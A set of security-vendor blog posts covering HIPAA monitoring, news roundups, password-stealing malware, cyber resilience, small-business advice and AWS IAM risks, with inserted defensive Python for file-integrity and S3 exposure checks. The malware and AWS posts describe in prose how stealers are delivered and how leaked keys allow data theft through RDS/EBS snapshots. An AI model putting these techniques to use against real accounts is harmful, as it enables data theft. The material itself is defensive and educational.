Examples: Use automated asset discovery for on-premises and cloud environments and then create asset groups such as business critical assets or HIPAA assets for ongoing monitoring, management and reporting. Identify systems with known vulnerabilities and use correlation rules to detect threats.

Monitor access control; data security; information protection, processes and procedures; and protective technology
Examples: Monitor for successful and failed logon events to assets. Monitor for communications with known malicious IP addresses or use file integrity monitoring (FIM) to detect, assess and report on changes to system binaries and content locations. Schedule vulnerability scans, automate assessments, and plan for mitigation. Review events and detected incidents.

Detect anomalies and events; and ensure continuous security monitoring and detection processes
Examples: Aggregate events from across on-premises and multi-cloud environments. Classify threats based on their risk level. Monitor for stolen credentials, malware-based compromises such as communication to a known command and control (C&C) server, anomalous user and admin activities, file integrity, and vulnerabilities.

Automate event and incident analysis; mitigation
Example: Automate forensics tasks to be executed in response to a detected threat and simplify forensics investigations with filters, search and reporting capabilities for event and log data. Automate actions to contain threats, such as isolating systems from the network.

Automated reporting
Use out-of-the-box reporting to document that you’ve made an accurate assessment of the risks and vulnerabilities to the confidentiality, integrity and availability of all electronic PHI — and to quickly show the status of technical controls that align to HIPAA or other regulations.
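A minimal version of the file integrity monitoring (FIM) check named in the examples above, written here as an added illustration and not taken from USM or any AlienVault code: it hashes the files under a monitored directory into a JSON baseline and, on a later run, reports which files were added, removed or modified. The monitored directory, file names and baseline path used in demo() are constructed for the demonstration.

```python
"""File integrity monitoring (FIM) baseline-and-compare check.

Added example only: this is not AlienVault USM code or any vendor's FIM.
It hashes every regular file under a monitored directory into a JSON
baseline and, on a later run, reports files that were added, removed or
modified (content hash or permission bits changed). The monitored
directory, file names and baseline path used in demo() are constructed.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk_size: int = 64 * 1024) -> str:
    """Return the SHA-256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict:
    """Walk root and record hash, size and permission bits per regular file.

    Keys are POSIX-style paths relative to root so the baseline can be
    compared even if the tree is mounted elsewhere later. Symlinks are
    skipped: following them could pull in files outside the monitored tree.
    """
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if path.is_symlink() or not path.is_file():
                continue
            st = path.stat()
            baseline[path.relative_to(root).as_posix()] = {
                "sha256": hash_file(path),
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o7777),
            }
    return baseline


def save_baseline(baseline: dict, baseline_path: Path) -> None:
    """Persist the baseline; in practice keep it off-host or read-only."""
    baseline_path.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(baseline_path: Path) -> dict:
    """Read a baseline written by save_baseline()."""
    return json.loads(baseline_path.read_text())


def compare(old: dict, new: dict) -> dict:
    """Diff two baselines into sorted added / removed / modified path lists."""
    old_keys, new_keys = set(old), set(new)
    modified = [
        p for p in old_keys & new_keys
        if old[p]["sha256"] != new[p]["sha256"] or old[p]["mode"] != new[p]["mode"]
    ]
    return {
        "added": sorted(new_keys - old_keys),
        "removed": sorted(old_keys - new_keys),
        "modified": sorted(modified),
    }


def demo() -> dict:
    """Build a constructed 'system binaries' tree, baseline it, change it, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "bin"  # constructed monitored directory
        root.mkdir()
        (root / "service.exe").write_bytes(b"original service bytes")
        (root / "config.ini").write_text("mode=safe\n")
        baseline_path = Path(tmp) / "fim-baseline.json"
        save_baseline(build_baseline(root), baseline_path)

        # Simulated changes that a compromise or an unapproved change could introduce:
        (root / "service.exe").write_bytes(b"replaced service bytes")  # modified
        (root / "dropper.dll").write_bytes(b"unexpected new file")     # added
        (root / "config.ini").unlink()                                  # removed

        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In a real deployment the baseline is refreshed only through an approved change process, and any report entry outside a change window is an event to review.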
Maintaining adherence to HIPAA is no small feat considering the dozens of criteria that are considered in the HIPAA Audit Checklist. Attempting to manage your compliance program manually and without the help of expert healthcare security consultants will not only take up massive amounts of time, it could result in your team missing an essential component of the regulation, or worse yet, enduring a breach that compromises patient data or takes down the network. However, with the right mix of people, processes and technology, it’s not impossible to stay on top of compliance management while ensuring your network is secure and patient data protected year-round.

HIPAA Regulations

HIPAA Privacy Rule: This Rule sets national standards for the protection of individually identifiable health information by three types of covered entities: health plans, healthcare clearinghouses, and health care providers who conduct the standard healthcare transactions electronically.

HIPAA Security Rule: This Rule sets national standards for protecting the confidentiality, integrity, and availability of electronic protected health information. The Privacy Rule is located at 45 CFR Part 160 and Subparts A and E of Part 164 (e-PHI).

HIPAA Breach and Notification Rule: The HIPAA Breach Notification Rule, 45 CFR §§ 164.400-414, requires HIPAA covered entities and their business associates to provide notification following a breach of unsecured protected health information.
It’s December, so you’re either on holiday, wishing you were on holiday, or hoping the next security article you read isn’t related to predictions. Well, I can’t help you with the holidays, but I can promise there will be no predictions here. It’s just good old-fashioned news, the juiciest of which made my heart flutter.

US Postal Service

Ah, the good old USPS had a weakness that allowed anyone who has an account to view details of around 60 million users, and in some cases modify the account details on their behalf. Luckily, a security researcher spotted the error about a year ago and notified USPS. Unluckily, the USPS didn’t respond to the researcher or fix the issue. Luckily, the researcher reached out to a little-known cyber-reporter by the name of Brian Krebs, who contacted USPS and, lo and behold, a miracle happened and the issue was fixed in 48 hours!

USPS Site Exposed Data on 60 Million Users | Krebs on Security

This raises the question of whether there is anything lesser-known researchers, who don’t have the public profile of Brian Krebs, can do to help companies fix issues outside of a formally defined bug bounty program. Back in September, Troy Hunt posted on this very topic: the effectiveness of publicly shaming bad security. And not to say I agree with shaming companies, but when you look at instances like USPS, you do wonder if there is a better way.

The Effectiveness of Publicly Shaming Bad Security | Troy Hunt

GCHQ Reveals it Doesn’t Always Tell Firms if Their Software is Vulnerable to Cyber Attacks

In other words, spy agency keeps secrets. There are four reasons given as to why GCHQ may not disclose flaws:
- There is no way to fix it
- The product is no longer supported
- The product is so poorly designed it can never be secure
- There is an overriding intelligence requirement that cannot be fulfilled in any other way
I particularly like number 4 as the catch-all clause.
You could say there’s an overriding intelligence requirement for almost anything, and refuse to release any details under secrecy laws. I’m not necessarily bashing GCHQ; governments have been known for stockpiling exploits. They have a particular mission and objective, and this is how they go about fulfilling it. However, it does mean companies should not rely solely on GCHQ or other government agencies for their threat intelligence. Rather, building their own capabilities and threat sharing channels remains necessary.

GCHQ reveals it doesn't always tell firms if their software is vulnerable to cyber attacks. | Sky News

Scamming the Scammers

I don’t think there are many stories more satisfying than when scammers get taken for a ride. This time it’s courtesy of Hacker Fantastic, who got contacted by the famous singer Rhianna out of the blue to help her get some money.

Scamming the scammers | Medium, Hacker Fantastic

ENISA Releases Online NIS Directive Tool

ENISA released an interactive tool showing the relevant national laws and regulations and, per sector and subsector, the national authorities supervising the NIS Directive. It’s pretty cool.

NIS Directive Tool | ENISA

Open
Password security has always been a challenge. Brute force attacks are constantly getting more powerful, but they aren’t the only threat you have to worry about. A range of password stealing malware continues to grow in popularity. One example, Agent Tesla, has seen its detection rate grow 100% in just three months, according to data from LastLine. Despite this rapid growth, Agent Tesla is far from the most popular. That title goes to Pony, which represents 39% of the total password stealer detections, according to Blueliv’s 2018 report, The Credential Theft Ecosystem. LokiPWS and KeyBase trailed Pony at 28% and 16%, respectively. These password stealers are each capable of stealing credentials and other information from a wide variety of programs. Each is unique with its own techniques for delivery and a range of features that hackers can use to mount attacks. Despite the differences, each of these programs can have severe impacts on their victims. The negative impacts can range from having all of the money stolen from an individual’s accounts, to the theft of a company’s intellectual property. The key features of some of the most common password stealers are listed below:

Agent Tesla

Like most password stealers, Agent Tesla can access a wide variety of your information, ranging from your credentials to your keystrokes. It can even take screenshots and videos from your device’s camera. Agent Tesla targets a number of major programs, including web browsers, email clients, FTP applications and other commonly used software. Once Agent Tesla has been installed on a target’s computer, it can also be used to download other malware. This feature allows threat actors to intensify their attacks and make them even more devastating. Its pricing shows that the malware industry hasn’t been left behind in the X-as-a-service boom, because it is available as part of a plan that starts from $15 per month.
This price includes all the 24/7 support someone might need to assist them in their criminal endeavors. Of course, payments are made in Bitcoin. Despite running what must have been an incredibly profitable business, Agent Tesla’s creators have recently posted an update stating they will crack down on illegal use of the program. Under its terms of service, it declares that the software must only be used within the law, but features such as anti-antivirus throw these intentions into question. Due to the recent media attention that Agent Tesla has received, the developers will strip some of its more questionable features, such as anti-antivirus and webcam capture. They also claim to be banning those who are using the program maliciously. Only time will tell whether the creators are sincere, or if this is merely an attempt to keep the authorities from knocking down their doors.

Pony

Pony is currently the most popular password stealer, but it’s certainly not new. In the past, it has been used to control a number of enormous botnets, which by 2013 had already stolen more than two million credential sets. In 2014, it was involved in a series of attacks that stole $200,000 worth of cryptocurrencies, as well as 700,000 sets of credentials. In recent years, Pony has seen prominence as a loader alongside other malware, such as CryptoWall and Angler. These programs, a type of ransomware and an exploit kit, respectively, help attackers launch even more devastating assaults.

LokiPWS

As the second most commonly encountered password stealer, LokiPWS has been involved in a significant number of attacks. It can be purchased from a range of illicit marketplaces for between $200 and $400, depending on the desired functionality. LokiPWS is comprised of a loader, a password stealer and a wallet stealer, which makes it useful in a variety of attacks.

TrickBot

TrickBot was originally a banking trojan, but has since been updated to steal other credentials as well.
This malware is modular and continues to have new features added by its developers. The coding for the newest components isn’t as clean as the earlier parts, but if it continues to be refined, we could see TrickBot used in a greater number of password stealing scams.

Common Attack Vectors

Attackers can load password stealers onto their targets’ systems in the same ways as most malware. These include social engineering, fake Adobe Flash and other program updates, drive-by downloads, and “free” online software. The following are some of the most common techniques that we see associated with password stealers:

Social Engineering

Social engineering (a.k.a. phishing) is one of the most prominent methods that hackers use to load password stealers onto their victims’ computers. They commonly use convincing emails to trick the recipients into downloading an attachment. The level of sophistication in the email will depend on the attacker’s game plan. Some may send highly-tailored emails to a select group of people in the hopes of convincing a large percentage to download the attachment. Others may put less effort into each email, but send them to a much greater number of people. The rate of success won’t be anywhere near as high, but this technique allows them to attempt to manipulate a much larger group of people. The attachments can take many forms, including RTF files, PDF files, PUB files, DOC and DOCX files, XLS files, EXE files, images and more. It is common for the malware to be disguised as seemingly legitimate invoices and other important documentation. These tricks can easily fool users into unwittingly granting access to the password stealer. A recent campaign has been taking advantage of vulnerabilities to spread both LokiPWS and Agent Tesla. The target is tricked into downloading a DOCX file, which in turn downloads an RTF file.
This technique takes advantage of both a Microsoft Office remote code execution flaw, as well as a memory handling bug, in order to help slip the malware past antivirus software. TrickBot is often hidden in Excel files. In these attacks, the user is told that the document was created with an older version of the program, and that they need to “enable content” in order to access the file. Clicking this button runs the macros, which kicks off the malicious code and begins the TrickBot download. Agent Tesla even has a customizable “Fake Message” option. This allows an attacker to tailor a pop-up that convinces the target to install the malware. This feature makes it simple to create a legitimate-looking dialogue box that might say something like “This program needs to be updated before it can launch. Update now?” Users will often click to run the update without even thinking about it. Something so simple can end up having dramatic effects, because of course, the program isn’t actually being updated. What’s really going on is that Agent Tesla is tricking the user into letting it install itself.

Attacks Launched from USBs

Malware like Agent Tesla can also be preconfigured to run from a USB stick. This gives attackers more imaginative ways to upload their malware onto a target’s computers. One example involves threat actors leaving a bunch of malware-riddled USBs in an employee car park in the hope that some curious workers will pick them up and plug them into their office computers. When the USB is plugged in, Agent Tesla loads to the computer and can begin logging everything that the user does.

Getting Past Your Computer’s Defenses

Computers and networks have a range of defenses that help keep the bulk of malware at bay. These aren’t perfect, because the landscape of cyber threats is constantly evolving. This makes it much more challenging to prevent cutting-edge attacks.
Agent Tesla has a wide variety of configuration options that enable threat actors to customize how they launch their attack to bypass defenses. With just a few clicks in an easy-to-use settings menu, an attacker can choose whether to disable the target’s Task Manager, how it will get past anti-analysis tools, whether it will launch automatically after rebooting, and much more. The Agent Tesla website used to feature support that gave tips on getting around defenses, including advice on how to hide the malware in other files, and how to trick security tools. The website may have claimed that the software was only designed for monitoring personal computers, but all of this auxiliary information hints at other intentions.

How Do Password Stealers Take Your Credentials?

Once a password stealer has made its way onto the target’s systems, it starts getting to work. There is some variance in how each of these programs function, but many of the core elements and features are the same.

Keyloggers

Keyloggers are some of the most commonly used tools for stealing credentials and other information that may be useful to attackers. They can be set up to record every keystroke that the target makes, sending the data back to the attacker. Of course, whenever the target types their usernames and passwords, this information goes straight into the attacker’s hands.

Clipboard access

Many password stealers can also access the data that is being stored in your clipboard. Clipboards aren’t a secure part of your computer, and the information that is stored in them can be accessed by all active processes, which means that malware can also take this information. This is somewhat worrying for those whose password manager uses the clipboard, but the majority of these programs tend to erase the data straight away. If you ever have to manually copy a password, it’s probably best to clear the clipboard after you have finished pasting.
Screenshots

It’s also common for password stealers to take screenshots of their target’s activity. This helps attackers keep track of what their victims are doing and enables them to log even more of their information.

Videos

Some password stealers can hijack a device’s camera and take pictures or video. This allows threat actors to build up an even greater profile of information on their victims.

Which Programs Do Password Stealers Target?

Most of the common password stealers can take credentials and other information from a wide variety of applications. These include common web browsers like Chrome, Safari, Microsoft Edge and Opera, FTP programs like FileZilla and WinSCP, email clients like Outlook, and many more. Some of these password stealers are set up to access data from more than one hundred commonly used programs.

How Does This Information Get Sent Back to the Threat Actor?

Once password stealers get their hands on your valuable data, they send it back to the attacker. The information is surreptitiously sent to a server, and then either to the attacker’s email or a dashboard. These dashboards vary in complexity, but some provide an impressive level of organization that makes it easy for threat actors to keep track of a large number of victims. As an example, Agent Tesla’s dashboard shows the progress of attacks against each of its targets. Menus clearly show the keystrokes, screenshots, passwords and other data that has been collected. Once an attacker has this data, they can either sell it in bulk, use it to steal from you, or use it to mount further attacks and penetrate your systems more deeply.

How Can Password Stealers Impact Organizations and Individuals?

Passwords are one of the most important systems that we have for controlling access to our data. Now that we conduct significant parts of our work and personal lives online, this makes them gateways to incredible amounts of our information.
Password stealers can easily grant access to many aspects of our lives and businesses, and the impacts can be disastrous and wide-reaching. At a personal level, password stealers can enable threat actors to withdraw money from your bank account, hijack your social media or even commit complete identity theft. Organizations also face significant threats, because password stealers have the potential to give a threat actor complete access. Once an attacker is inside a company’s systems, they can copy its intellectual property, steal its data, lock up its information with ransomware, or even attempt extortion. The results can be as broad as an attacker’s imagination.

Staying Safe from Password Stealers

As you can see, password stealers represent a significant threat. Unfortunately, there is no surefire way to completely guard yourself and your organization. Despite this, following security best practices will reduce the risks to an acceptable level, especially if adequate staff training is part of the process. Individuals and employees need to be aware of the risks and only open attachments if they are certain that they are legitimate. It’s important to encourage a workplace culture where employees feel comfortable checking with IT whenever they are unsure of a potential security issue. Implementing two-factor authentication is another crucial mitigation. If an authentication process requires a token, biometric input, an authenticator app or an SMS code in addition to the user password, it can make it significantly more difficult to break into the systems. Password stealers can grant absolute access to our online worlds, so it’s important to be vigilant against them. While there are some programs that claim to be able to remove them, like all things in cybersecurity, it is much less costly to focus on prevention.
Businesses rely on technology more today than they ever have in the past. In fact, many business models are built entirely around a technology which, if disrupted, could spell ruin. A traditional business with a brick and mortar presence is probably better-placed to withstand an extensive online disruption or outage. For example, if a bank’s online system or mobile app is unavailable, it has other options to fall back on – even if it does involve customers physically having to walk into branches to deposit cheques. But those examples are rare, and even the most traditional of businesses are embracing the digital revolution at a rapid pace, vaporizing physical assets in the process. One only has to look at their smartphone and see how many physical items it has replaced, from maps, to flashlights, to cameras. So, it’s important that the digital infrastructure that underpins the modern world is resilient. The ‘A’ in the security CIA of ‘Confidentiality, Integrity and Availability’ helped professionals focus on business continuity planning, and disaster recovery. But have we been focusing on the wrong things?

Earthquake Resilient Buildings

Recently a building surveyor was explaining to me the concept of earthquake-resilient buildings. He highlighted an important point that in most countries, building code objectives are mapped to collapse resilience, not to damage. The analogy is akin to a car which has designated crumple zones to absorb the brunt of the force during an accident. In other words, resilience in buildings and vehicles is all about saving lives - not the building or the vehicle. Which makes me wonder whether businesses have focused on building resilience into the wrong parts. Is the industry focused more on saving the building or the vehicle at the expense of lives?
Broadly speaking, while lives are not literally at risk (although with IoT making its way into every facet of life including medical devices, the risk does increase), there is a lot of personal information that companies are in possession of which slips through the radar of most planning sessions. The response is often summed up as, “let’s offer free credit monitoring for a year for our affected customers.” In the building analogy, it’s the equivalent of, “Sorry your building collapsed and everyone died during the earthquake. Here’s a year’s coupon to stay in a local hotel.”

Crown Jewels

Companies are pretty good at protecting their own crown jewels. But they’re often limited in what they do for their customers. One of the reasons is that the emphasis is put on the wrong type of information. PCI DSS is a well-meaning standard, but it forced companies to focus on protecting payment card data. The problem with this approach is that card data is pretty much a commodity. It naturally ages, and new cards need to be issued as a matter of course. A breach simply accelerates the process. The point being that payment cards have natural resilience built into them. That’s not to say that when cards are breached there isn’t a cost associated. It’s to avoid bearing the burden of these costs that card issuers rallied to have PCI DSS implemented, with the threat of big penalties to any company that was breached. This in turn forced companies to disproportionately invest in protecting card numbers over actual customer information. Protecting the buildings at the expense of their inhabitants. Regulations like GDPR are a step in the right direction with their focus on protecting the privacy of individuals. However, GDPR too wields a big stick with the threat of massive fines. So, companies will do what they can to protect their businesses.

Retrofitting protection

The evolution of many companies means that protection is often retrofitted under the guise of compliance.
But there is a significant difference between retrofitting to prevent business damage, and retrofitting to prevent the entire business collapsing. We need to shift the way we think of information and the controls we put in place so that they can not only withstand the metaphoric cyber earthquake, but also protect the customers. The first part of this is for businesses to understand what aspects of their digital infrastructure are commodities or standard offerings that can be swapped out or replaced relatively easily, versus custom-designed and individual data that is irreplaceable. For this, the best place to start is the beginning. Design decisions need to be thought out better and not rely on decisions made in years gone by, when the digital landscape was a different place. Haroon Meer probably said it best when he described customer data as being toxic. It has its benefits, but companies should be prepared to wear hazmat suits when dealing with it. This includes not using personal information for trivial functions. For example, does every online registration require a user’s personal information such as date of birth? If not, then why capture it? Similarly, should the user’s email ID be used as their userID? As email has become more important for users, so has the risk of it being targeted. Maybe the data can be captured, but alternative methods used to protect it, similar to how many companies choose to tokenize card data. Maybe your favourite pizza shop doesn’t need to store your address in all its databases; a tokenized version can suffice. So, if it does get breached, not only are the customer details protected, but business can continue with minimal disruption - allowing true resilience against such events. After all, what’s the point in protecting all your buildings if there’s no-one left to inhabit them?
Three simple steps to protecting your small business

Continued news reports of large-scale data breaches and the steady increase of cyber fraud like spam calls, identity fraud and unauthorized account access should be enough to scare anyone. So-called nation-state hackers attempting to infiltrate government entities and universities, massive data breaches, and new Ransomware threats are constantly in the headlines. So why doesn’t this encourage more small business owners to take cybersecurity more seriously? Many small businesses are currently going digital and moving data, applications and services to the cloud. In fact, the most innovative small businesses have embraced digital transformation as an integral part of their growth plans. This evolution makes their business more vulnerable to a lurking hacker. And perhaps too trustingly, many small business owners think that because of their size, they are not a target. Hackers don’t discriminate. Malware doesn’t discriminate. Everyone is a target, and in fact, hackers see the data that small businesses have as a gateway to attacking larger businesses. And Malware essentially looks for open doors (i.e. unpatched machines) to infect. As we look to the start of a new year, there is no better time to assess your business’s cybersecurity posture – or in some cases start from scratch – to ensure you are prepared and can respond to cyberattacks. Here are a few affordable and simple recommendations that can improve your cybersecurity posture and help protect your business from the inevitability of a cyberattack in 2019:

Stay Aware: The simplest thing you can do is to stay current on trends and threats affecting small businesses. We’ve seen unprecedented levels of attacks on small business in 2018, especially with Ransomware (where your device is essentially taken hostage for a fee). It’s essential to understand the types of attacks that could put your business at risk as well as the current cybersecurity landscape.
Visit AT&T Cyber Aware for the latest news and for information on reporting fraud associated with your AT&T Business account.

Hire a consultant: A consultant can take a holistic look at your business, identify the gaps and help you understand how to improve your cybersecurity posture. While some see consultants as an added expense, their role is essential for small businesses that don’t have an IT or cybersecurity expert on staff. A consultant can help you develop and implement a plan for monitoring for threats, incident response and remediation that’s within your budget.

Buy Cyber Insurance: Cybersecurity insurance isn’t new. Large enterprises have had a cybersecurity insurance policy in place for decades now. However, 2019 is going to be the first year that it’s accessible and affordable to businesses of all sizes. For AT&T Business customers, this is made possible through policies, underwritten by CNA, with Lockton Affinity serving as the insurance broker. A recent Ponemon Institute Report found that in 2017, cyberattacks cost small and medium-sized businesses an average of $2,235,000. That’s a staggering number that will only continue to increase as hackers become more sophisticated and continue to target the most vulnerable. My advice to small business owners – as you’re thinking about your holiday shopping list, add cyber insurance to that list to give yourself peace of mind. We know small businesses are focused on what they do best, and cybersecurity isn’t always top of mind. Let’s bring it to the top of the list for next year.

Anne Chow, President – National Business, AT&T Business
We’ve had a lot to celebrate this year. AlienVault, now an AT&T company, has received many awards, including three this quarter. In October, USM Anywhere was named the 2018 Cloud Security Solution of the Year after receiving the most votes in the industry. This recognition validates our SaaS-driven deployment model, which integrates critical security capabilities into a unified platform enabling faster threat detection and response across cloud and on-premises environments. Here’s a photo of Sophia Anastasi, AlienVault UK Partner Account Manager, accepting the award at Computing Security’s awards ceremony. Our channel team is also receiving industry accolades. Last Thursday night at the Channelnomics Innovation Awards ceremony in New York City, Mike LaPeters, Vice President of Global Channels, accepted the award for Security Partner Program of the Year in North America. In October, Mike was selected as a winner of the 2018 Channel Futures Circle of Excellence Awards for his vision, innovation and advocacy of the indirect channel in helping AlienVault solution providers create business value for their customers. On AlienVault receiving these awards, Mike said, “Both of these awards are a testament to our focus on enablement. We help participants in the AlienVault Partner Program to create new opportunities for business growth, expansion and profitability powered by AlienVault USM.” With 2018 coming to a close, we are excited to see what the new year brings as we continue to deliver phenomenal security products to our customers and solution providers.
Last week I was off attending IRISSCON in Dublin and so there was no update, and this week I’ve been at the SANS EU security awareness summit - so while I have been hearting things for the last two weeks, I’ve not had a chance to put them down. I don’t want to miss two weeks in a row - so I’ll give you a quick download and hopefully normal service will resume next week!

Chat app Knuddels fined €20k under GDPR regulation
The chat platform violated GDPR regulation by storing passwords in clear text, and for this reason the regulator imposed its first penalty under the privacy regulation.
Chat app Knuddels fined €20k under GDPR regulation | Security Affairs

IOC Origins
Richard Bejtlich gives a historical view into the origins of IOCs.
The Origin of the Term Indicators of Compromise (IOCs) | TaoSecurity

The spread of low-credibility content by social bots
The massive spread of digital misinformation has been identified as a major threat to democracies. Communication, cognitive, social, and computer scientists are studying the complex causes for the viral diffusion of misinformation, while online platforms are beginning to deploy countermeasures. Little systematic, data-based evidence has been published to guide these efforts. Here we analyze 14 million messages spreading 400 thousand articles on Twitter during ten months in 2016 and 2017. We find evidence that social bots played a disproportionate role in spreading articles from low-credibility sources.
The spread of low-credibility content by social bots | Nature.com

The $1M SIM Swap
A 21-year-old has been accused of SIM-swapping the mobile number of a Silicon Valley executive in order to steal roughly $1 million in cryptocurrency.
SIM-swapping 21-year-old scores $1 million by hijacking a phone | ZDNet

A day in the life of a Trickbot hunter
Nice writeup!
Day in the life of a researcher: Finding a wave of Trickbot malspam | SANS

Crypto hacking
If you maintain any software libraries that deal with cryptocurrency wallet private keys, there’s a huge incentive for hackers to compromise your library’s dependencies, and dependencies of dependencies. That’s what happened with this npm package.
I don’t know what to say | GitHub

Get SaaSy
The NCSC’s new SaaS security collection provides a lightweight approach for determining the security of any SaaS application. The collection also includes security reviews of the 12 most asked-about SaaS services used across UK government.
SaaS security - surely it’s simple? | NCSC

Today’s Deep Learning "AI" Is Machine Learning Not Magic
Well, if AI isn’t magic, I should update my Uncybered browser plugin!
Today’s Deep Learning "AI" Is Machine Learning Not Magic | Forbes

Chinese Ramp up AI
When I read stories like this, my worry that machines will take over human jobs subsides. In this story, Chinese cities have rolled out AI-powered facial recognition technology to identify jaywalkers (because I’m sure they’ve solved every other crime out there). The results… well, can you say dystopian?
AI Mistakes Bus-Side Ad for Famous CEO, Charges Her With Jaywalking | CX Live

I hope to be this petty some day
Zuckerberg told Facebook execs to stop using iPhone after Tim Cook privacy comments | Apple Insider
Although, is it as petty as 50 Cent?
50 Cent buys 200 tickets to Ja Rule concert to keep seats empty in ongoing feud | CBS News

Other stories of interest
I still miss my headphone jack, and I want it back | Fast Company
AWS has released some free training | AWS
Regular Exercise May Keep Your Body 30 Years ‘Younger’ | NY Times
The Next Data Mine Is Your Bedroom | The Atlantic
The Wartime Spies Who Used Knitting as an Espionage Tool | Atlas Obscura
This is the first of a 4-part blog series on security issues and monitoring in AWS. Identity and Access Management (IAM) in AWS is essentially a roles and permissions management platform. You can create users and associate policies with those users. Once those users are established you get a set of keys (an access key and a secret key), which allow you to interact with an AWS account. So it’s kind of like having a card key into the data center: if you get into the data center, you have physical access to assets and you can do a bunch of things. In the AWS world there is no physical access to a data center; instead you create keys and interact with an API to do the same things you would do in a physical environment, like racking servers in a data center. Common IAM risks are associated with someone getting hold of, for example, a set of keys that have a policy associated with them that enables an attacker to get into the environment and do potentially risky things. Following are a couple of examples: EC2 instance creation or deletion. This is fairly common and relatively easy to do compared with the other examples. If somebody gets hold of a set of keys that allows them to create EC2 instances in your AWS account, that’s the first thing they’re going to do. There are a lot of bots out there looking for this access, and if a bot finds a set of keys that allows it to start interfacing with EC2, it’s going to spin up a bunch of instances - likely to start mining cryptocurrency. This actually happened to Tesla, a pretty good-sized company with quite a few resources to allocate to securing its infrastructure. There are many examples in the news of keys getting published to GitHub inadvertently, and there are bots out there scraping GitHub looking for access keys; the second they find them, they’re in your AWS account seeing what they can do. 
Another scenario is roles that do automated things, like take RDS snapshots or EBS snapshots. The attacker might abuse the automated process to back up various resources like EBS or an RDS database. If an attacker gets access to that role or the keys associated with it and takes snapshots of these resources, they can deploy a new RDS database based on the snapshot. And when they do that they get to reset the passwords associated with the database. So now they've got access to all of your data without actually having to have the passwords required on the RDS instance. It's the same thing with the EBS (Elastic Block Store) snapshot. If somebody is able to take a snapshot, basically of a hard drive in AWS, they can launch a new instance connected to that block store and do some interesting things with it. For example, assuming they’re able to create an SSH key pair in your account, they could launch a new instance from the snapshot and assign their key pair to the instance, giving them full access to the data of the original instance. If they can’t create SSH keys in your account, they might try to mount the snapshot to an existing instance they can already access. Basically this is a crafty way to work around credential control and access control. This is a technique that's been used to actually exfiltrate data out of AWS, just by taking snapshots. The last example is account hijacking. One story that got some headlines a while back involved attackers getting full control of an AWS account through a set of keys. The account was compromised so thoroughly that trust in the service was eroded to the point that the company went out of business – an extreme scenario, but if someone gets that level of access in your AWS account, you can pretty well expect that they're going to hold it for ransom. There are other risks, like S3 bucket exposure risks, that are much easier to take advantage of. 
The good news is that Amazon has recently added 4 new options that allow the account owner to set a default access setting for all of an account's S3 buckets. The new settings override existing or newly created bucket-level ACLs (access control lists) and policies. We’re not highlighting S3 bucket exposure risks above because there were too many to choose from. In my search for specific data exfiltration issues that have occurred with S3, I came across this GitHub Repo where the well-known public breaches are organized by date. You'll find 25 different instances of actual breaches where somebody had leaked data from a publicly exposed S3 bucket. It works as follows: Say somebody creates an S3 bucket, where they’ve got some process running that’s capturing some data and writing the information to a file in the bucket. Then somebody else comes along later and makes that bucket publicly readable. Or, the bucket was initially set up as publicly readable and nobody noticed it. This kind of thing happens all the time, and there are adversaries out there just scanning S3 looking for publicly accessible buckets. And once they find the buckets they just scrape the data in them and figure out what treasures they've got later. They don't even care what they’re downloading. It’s a simple thing for them to carry out. It doesn't require a super sophisticated attack vector. We'll dig further into AWS security risks and what to do about them in the next blog of this series.
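The public-bucket scenario above can be checked mechanically. The following is an added example (not AWS’s or AlienVault’s code) that decides whether a bucket is effectively readable by the public from its ACL, its bucket policy and the account-level Block Public Access settings just mentioned; the bucket names, policies and settings are constructed for illustration, and the policy check ignores Condition blocks so it errs on the side of alerting.

```python
"""Added example (not AWS's or AlienVault's code): decide whether an S3 bucket is
effectively readable by anyone on the internet, combining its ACL, its bucket policy
and the account-level S3 Block Public Access settings the post refers to. Bucket
names, policies and settings below are constructed for illustration."""
import json

# Canned ACL grantee groups that make a bucket or object public.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
BPA_KEYS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")

def acl_is_public(acl):
    """True if any grant goes to the AllUsers or AuthenticatedUsers group."""
    return any(grant.get("Grantee", {}).get("URI") in PUBLIC_GRANTEES
               for grant in acl.get("Grants", []))

def policy_is_public(policy_json):
    """True if an Allow statement names the wildcard principal.
    Simplification: Condition blocks (e.g. aws:SourceIp) are ignored, so a
    conditioned wildcard still counts as public, which errs on the side of alerting."""
    if not policy_json:
        return False
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        if principal == "*":
            return True
        if isinstance(principal, dict):
            aws = principal.get("AWS", [])
            if aws == "*" or "*" in (aws if isinstance(aws, list) else [aws]):
                return True
    return False

def effective_settings(account_bpa, bucket_bpa):
    """Account-level and bucket-level Block Public Access combine; the most
    restrictive value wins, so a flag is on if either level turns it on."""
    return {k: bool(account_bpa.get(k)) or bool(bucket_bpa.get(k)) for k in BPA_KEYS}

def public_exposure(bucket, account_bpa):
    """Return the reasons the bucket is publicly readable right now (empty = private).
    BlockPublicAcls and BlockPublicPolicy only reject *new* public ACLs/policies; it is
    IgnorePublicAcls and RestrictPublicBuckets that neutralise existing ones."""
    settings = effective_settings(account_bpa, bucket.get("BlockPublicAccess", {}))
    reasons = []
    if acl_is_public(bucket.get("ACL", {})) and not settings["IgnorePublicAcls"]:
        reasons.append("ACL grants access to AllUsers/AuthenticatedUsers")
    if policy_is_public(bucket.get("Policy")) and not settings["RestrictPublicBuckets"]:
        reasons.append("bucket policy allows the wildcard principal")
    return reasons

def audit(buckets, account_bpa):
    """Map bucket name -> list of exposure reasons, for every bucket in the account."""
    return {b["Name"]: public_exposure(b, account_bpa) for b in buckets}

# Constructed sample account: one bucket public by ACL, one by policy, one locked down.
ALL_OFF = {k: False for k in BPA_KEYS}
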